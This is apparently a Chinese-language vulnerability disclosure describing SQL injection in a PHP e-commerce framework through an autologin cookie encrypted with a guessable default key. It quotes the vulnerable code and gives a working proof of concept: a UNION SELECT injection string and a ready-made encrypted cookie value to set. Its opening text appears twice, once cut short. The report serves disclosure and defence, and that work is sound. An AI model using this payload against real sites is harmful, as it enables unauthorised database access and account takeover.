### 简要描述: cookie没有过滤导致sql注入 ### 详细说明: 首先看cookie的加密: ``` ///加解密算法 private static function code($string, $op="decode", $key='', $expiry=0) ///加密算法调用: $value = Crypt::encode($value,self::getSafeCode()); ///解密算法的调用: $cookie= Crypt::decode($cryptCookie,self::getSafeCode()); ``` 这里的关键就是self::getSafeCode() ``` public static function getSafeCode() { if(self::$safeCode == '')self::setSafeCode(); return self::$safeCode; } public static function setSafeCode($scode='') { self::$safeCode = $scode.self::cookieId(); } private static function cookieId() { if(self::$safeLave==0)return 1; if(self::$safeLave==1) return md5(Chips::getIP()); if(self::$safeLave==2) return md5(Chips::getIP().$_SERVER["HTTP_USER_AGENT"]); } ``` 这就说明 整个cookie的加密秘钥无非是三种情况,而且这三种都是用户可以获取的。而且默认就是第一种方式,也就是key=1. 在来看方法:(classes/common.php) ``` //自动登录时的用户信息 static function autoLoginUserInfo() { $cookie = new Cookie(); $cookie->setSafeCode(Tiny::app()->getSafeCode()); $autologin = $cookie->get('autologin'); $obj = null;...
### 简要描述: cookie没有过滤导致sql注入 ### 详细说明: 首先看cookie的加密: ``` ///加解密算法 private static function code($string, $op="decode", $key='', $expiry=0) ///加密算法调用: $value = Crypt::encode($value,self::getSafeCode()); ///解密算法的调用: $cookie= Crypt::decode($cryptCookie,self::getSafeCode()); ``` 这里的关键就是self::getSafeCode() ``` public static function getSafeCode() { if(self::$safeCode == '')self::setSafeCode(); return self::$safeCode; } public static function setSafeCode($scode='') { self::$safeCode = $scode.self::cookieId(); } private static function cookieId() { if(self::$safeLave==0)return 1; if(self::$safeLave==1) return md5(Chips::getIP()); if(self::$safeLave==2) return md5(Chips::getIP().$_SERVER["HTTP_USER_AGENT"]); } ``` 这就说明 整个cookie的加密秘钥无非是三种情况,而且这三种都是用户可以获取的。而且默认就是第一种方式,也就是key=1. 在来看方法:(classes/common.php) ``` //自动登录时的用户信息 static function autoLoginUserInfo() { $cookie = new Cookie(); $cookie->setSafeCode(Tiny::app()->getSafeCode()); $autologin = $cookie->get('autologin'); $obj = null; if($autologin!=null){ $email = $autologin['email']; $password = $autologin['password']; $model = new Model("user as us"); $obj = $model->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.email='$email'")->find(); if($obj['password'] != $password){ $obj = null; } } return $obj; } ``` 这里获取了autologin 这个cookie值,再来看获取方式: ``` public static function get($name) { if(self::checkSafe()==1) { if(isset($_COOKIE[self::$per.$name])) { $cryptCookie = $_COOKIE[self::$per.$name]; $cookie= Crypt::decode($cryptCookie,self::getSafeCode()); $tem = substr($cookie,0,10); if(preg_match('/^[Oa]:\d+:.*/',$tem)) $cookie = unserialize($cookie); return $cookie; } return null; } if(self::checkSafe()==0) self::clear($name);// Tiny::msg('非法窃取COOKIE,系统将终止工作!',0); else return null; } ``` 在这里看到cookie只是在解密后做了一次反序列换转换,这就导致了直接被带入到了后端的sql语句中。 这里以默认的$key=1作为poc例子: 注入的sql语句片段式: ' union select 1,user(),1,1,1,1,1,1,1# 序列化后加密得到密文:bfc8bbdb4aOTkwMDQwMDMxMzkxNGY/MDRkZDBhZjIzPGE4MWA0NzVhOjE9e3EyNTgibW1gbGwiOXI8MzE6KyMgdW5pbm4gc2VtZWN9IjgpdXpley0hLDEuNyoxJTcuMikxKjEjKzt3Ojg6J3lkcHV/bHNkIjtzODE6IjAmOH0 设置cookie: safecode=1, Tiny_autologin=bfc8bbdb4aOTkwMDQwMDMxMzkxNGY/MDRkZDBhZjIzPGE4MWA0NzVhOjE9e3EyNTgibW1gbGwiOXI8MzE6KyMgdW5pbm4gc2VtZWN9IjgpdXpley0hLDEuNyoxJTcuMikxKjEjKzt3Ojg6J3lkcHV/bHNkIjtzODE6IjAmOH0 然后访问首页即可看到用户名 [<img src="https://images.seebug.org/upload/201409/04212918ef2a12cf5feef1fdf1cf1016551bdf53.png" alt="BaiduHi_2014-9-4_21-28-16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212918ef2a12cf5feef1fdf1cf1016551bdf53.png) [<img src="https://images.seebug.org/upload/201409/04212935c98dd1062a12db4ce1dfca32fb29ed60.png" alt="BaiduHi_2014-9-4_21-28-24.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212935c98dd1062a12db4ce1dfca32fb29ed60.png) [<img src="https://images.seebug.org/upload/201409/04212944158a36a64f603b04ebb0cf1effe30834.png" alt="BaiduHi_2014-9-4_21-28-47.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212944158a36a64f603b04ebb0cf1effe30834.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201409/04212918ef2a12cf5feef1fdf1cf1016551bdf53.png" alt="BaiduHi_2014-9-4_21-28-16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212918ef2a12cf5feef1fdf1cf1016551bdf53.png) [<img src="https://images.seebug.org/upload/201409/04212935c98dd1062a12db4ce1dfca32fb29ed60.png" alt="BaiduHi_2014-9-4_21-28-24.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212935c98dd1062a12db4ce1dfca32fb29ed60.png) [<img src="https://images.seebug.org/upload/201409/04212944158a36a64f603b04ebb0cf1effe30834.png" alt="BaiduHi_2014-9-4_21-28-47.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/04212944158a36a64f603b04ebb0cf1effe30834.png)
